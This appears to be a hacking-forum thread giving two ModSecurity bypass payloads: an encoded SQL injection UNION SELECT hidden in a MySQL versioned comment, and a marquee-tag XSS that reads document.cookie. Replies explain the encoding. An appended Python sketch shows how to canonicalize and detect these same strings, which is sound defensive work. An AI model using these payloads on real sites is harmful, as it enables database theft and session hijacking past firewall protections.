Using SQL Injection & XSS to Bypass ModSecurity

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

    Using SQL Injection & XSS to Bypass ModSecurity

    Effective SQLi to Bypass ModSecurity:

    Code:
    /*!50000%75%6e%69on*/ %73%65%6cect 1,2,3,4... --

    Effective XSS to Bypass ModSecurity:

    Code:
    <marquee loop=1 width=0 onfinish=pr\u006fmpt(document.cookie)>1337pwn</marquee>

    #2
    Thx, but I need more information about SQLi



      #3
      Originally posted by MoneyLuck:
      Thx, but I need more information about SQLi

      %75%6e%69on = union
      %73%65%6cect = select

      %75%6e%69 = uni (URL-encoded)
      %73%65%6c = sel (URL-encoded)



        #4
        If you just use regular Union select 1,2,3,4,...--, it will be blocked by ModSecurity.
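
For defenders, the encodings explained in posts #3 and #4 show why a filter has to match on the canonical form of a parameter rather than on the raw bytes. The sketch below is an added example (not from the thread, and not ModSecurity's own code); the function names, signature names and regexes are illustrative assumptions.

```python
import re
from urllib.parse import unquote

# MySQL executes the body of /*!NNNNN ... */ when the server version is >= NNNNN,
# so a detector must keep that body instead of discarding it as a comment.
VERSIONED_COMMENT = re.compile(r"/\*!\d*(.*?)\*/", re.S)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)
JS_UNICODE_ESCAPE = re.compile(r"\\u([0-9a-fA-F]{4})")

# Deliberately small, illustrative signature set (assumption, not a real rule set).
SIGNATURES = {
    "sqli-union-select": re.compile(r"\bunion\b\s+(?:all\s+)?\bselect\b"),
    "xss-event-handler-call": re.compile(r"\bon\w+\s*=\s*(?:alert|prompt|confirm)\s*\("),
}


def canonicalize(raw: str, max_rounds: int = 3) -> str:
    """Reduce a parameter value to the form the database or browser will interpret."""
    value = raw
    for _ in range(max_rounds):  # repeat so double URL-encoding is also unwrapped
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    value = VERSIONED_COMMENT.sub(r" \1 ", value)  # keep executable comment bodies
    value = PLAIN_COMMENT.sub(" ", value)          # ordinary comments act as whitespace
    value = JS_UNICODE_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), value)
    return re.sub(r"\s+", " ", value).strip().lower()


def detect(raw: str) -> list[str]:
    """Return the names of the signatures that match after canonicalization."""
    canon = canonicalize(raw)
    return [name for name, rx in SIGNATURES.items() if rx.search(canon)]


# The two strings quoted in the first post, plus a constructed benign value.
SAMPLES = [
    "/*!50000%75%6e%69on*/ %73%65%6cect 1,2,3,4... --",
    r"<marquee loop=1 width=0 onfinish=pr\u006fmpt(document.cookie)>1337pwn</marquee>",
    "student union, select committee",  # constructed benign text
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(detect(sample) or "clean", "<-", sample)
```

Matching only after every decoding layer has been removed is what makes the raw and encoded spellings equivalent to the filter; the benign sample shows the signature still requires the keywords to be adjacent.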
